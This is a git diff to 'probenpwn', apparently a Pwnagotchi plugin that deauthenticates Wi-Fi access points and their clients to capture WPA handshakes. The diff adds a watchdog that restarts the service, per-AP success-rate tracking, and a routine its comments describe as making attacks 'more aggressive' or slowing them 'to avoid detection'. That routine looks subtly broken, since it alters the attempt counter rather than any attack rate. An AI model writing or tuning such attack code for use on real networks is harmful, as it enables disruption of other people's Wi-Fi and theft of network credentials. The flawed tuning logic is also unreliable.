diff --git a/probenpwn.py b/probenpwn.py index 2d55af5..2839c1c 100644 --- a/probenpwn.py +++ b/probenpwn.py @@ -29,6 +29,11 @@ class probenpwn(plugins.Plugin): self.attack_attempts = {} # Optionally, track the number of successful handshakes per AP self.success_counts = {} + # Track the total number of successful and failed handshakes for feedback loop + self.total_handshakes = 0 + self.failed_handshakes = 0 + # Track the performance of each AP for dynamic adjustments + self.performance_stats = {} def on_unload(self, ui): if self.old_name: @@ -61,14 +66,32 @@ class probenpwn(plugins.Plugin): def _watchdog(self): CHECK_INTERVAL = 5 # seconds between checks while True: + # Check for wlan0mon interface missing if not os.path.exists("/sys/class/net/wlan0mon"): logging.error("wlan0mon interface missing! This likely indicates a Wi‑Fi adapter crash. " "Executing 'sudo systemctl restart pwnagotchi' to recover.") try: subprocess.run(["sudo", "systemctl", "restart", "pwnagotchi"], check=True) + logging.info("pwnagotchi service restarted successfully.") except Exception as e: logging.error("Failed to execute restart command: %s", e) break # Stop checking after issuing the recovery command. + + # Check for 'wifi.interface not set or not found' error in logs + try: + with open('/etc/pwnagotchi/log/pwnagotchi-debug.log', 'r') as log_file: + logs = log_file.read() + if "error 400: wifi.interface not set or not found" in logs: + logging.error("wifi.interface not set or not found! Restarting pwnagotchi to recover.") + try: + subprocess.run(["sudo", "systemctl", "restart", "pwnagotchi"], check=True) + logging.info("pwnagotchi service restarted successfully.") + except Exception as e: + logging.error("Failed to restart pwnagotchi service: %s", e) + break # Stop checking after issuing the recovery command. + except Exception as e: + logging.error("Error in watchdog: %s", repr(e)) + time.sleep(CHECK_INTERVAL) def track_recent(self, ap, cl=None): @@ -91,6 +114,10 @@ class probenpwn(plugins.Plugin): ap_mac = ap['mac'].lower() self.attack_attempts[ap_mac] = self.attack_attempts.get(ap_mac, 0) + 1 logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac'] if cl else 'N/A'}; attempt {self.attack_attempts[ap_mac]}") + + # Adjust attack parameters dynamically based on performance feedback + self.adjust_attack_parameters(ap_mac) + if cl: delay = self.dynamic_attack_delay(ap, cl) agent.deauth(ap, cl, delay) @@ -114,6 +141,36 @@ class probenpwn(plugins.Plugin): logging.debug(f"Dynamic attack delay for AP {ap['mac']} (signal {signal} dBm, {attempts} attempts): {randomized_delay:.3f}s") return randomized_delay + def adjust_attack_parameters(self, ap_mac): + """Adjust attack parameters based on performance metrics (success/failure rate)""" + if ap_mac not in self.performance_stats: + self.performance_stats[ap_mac] = {'success_rate': 0, 'failure_rate': 0, 'last_success': 0} + + success_count = self.success_counts.get(ap_mac, 0) + attack_count = self.attack_attempts.get(ap_mac, 0) + + # Calculate success rate + if attack_count > 0: + success_rate = (success_count / attack_count) * 100 + else: + success_rate = 0 + + # Update performance stats + self.performance_stats[ap_mac]['success_rate'] = success_rate + self.performance_stats[ap_mac]['failure_rate'] = 100 - success_rate + + # Dynamically adjust attack tactics based on success rate + if success_rate < 20: # Success rate below 20% indicates a need for more aggressive tactics + logging.info(f"Low success rate ({success_rate:.2f}%) on AP {ap_mac}. Making attack more aggressive.") + # Increase the attack frequency + self.attack_attempts[ap_mac] += 5 # Increase attempts + elif success_rate > 80: # Success rate above 80% means the attack is effective + logging.info(f"High success rate ({success_rate:.2f}%) on AP {ap_mac}. Reducing attack aggressiveness.") + # Slow down the attack to avoid detection + self.attack_attempts[ap_mac] = max(1, self.attack_attempts[ap_mac] - 2) # Reduce attempts + else: + logging.info(f"Moderate success rate ({success_rate:.2f}%) on AP {ap_mac}. Maintaining current attack tactics.") + def on_bcap_wifi_ap_new(self, agent, event): try: ap = event['data'] @@ -147,6 +204,8 @@ class probenpwn(plugins.Plugin): if ap_mac in self.attack_attempts: del self.attack_attempts[ap_mac] self.success_counts[ap_mac] = self.success_counts.get(ap_mac, 0) + 1 + self.total_handshakes += 1 + if 'mac' in ap and 'mac' in cl: logging.info("Captured handshake from %s (%s) -> '%s' (%s) (%s)", ap.get('hostname', 'Unknown AP'), ap['mac'], cl.get('hostname', 'Unknown Client'), cl['mac'], cl['vendor']) @@ -156,6 +215,12 @@ class probenpwn(plugins.Plugin): if cl_mac in self.recents: del self.recents[cl_mac] + # Expanded Feedback Loop: Tracking success/failure rates + handshake_rate = (self.success_counts.get(ap_mac, 0) / self.attack_attempts.get(ap_mac, 1)) * 100 + logging.info(f"Success rate for {ap['mac']}: {handshake_rate:.2f}%") + failure_rate = 100 - handshake_rate + logging.info(f"Failure rate for {ap['mac']}: {failure_rate:.2f}%") + def on_epoch(self, agent, epoch, epoch_data): for mac in list(self.recents): if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)): @@ -192,3 +257,4 @@ class probenpwn(plugins.Plugin): return [] # Return an empty list if no valid channels are found logging.debug(f"Scanning the following valid channels: {valid_channels}") return valid_channels +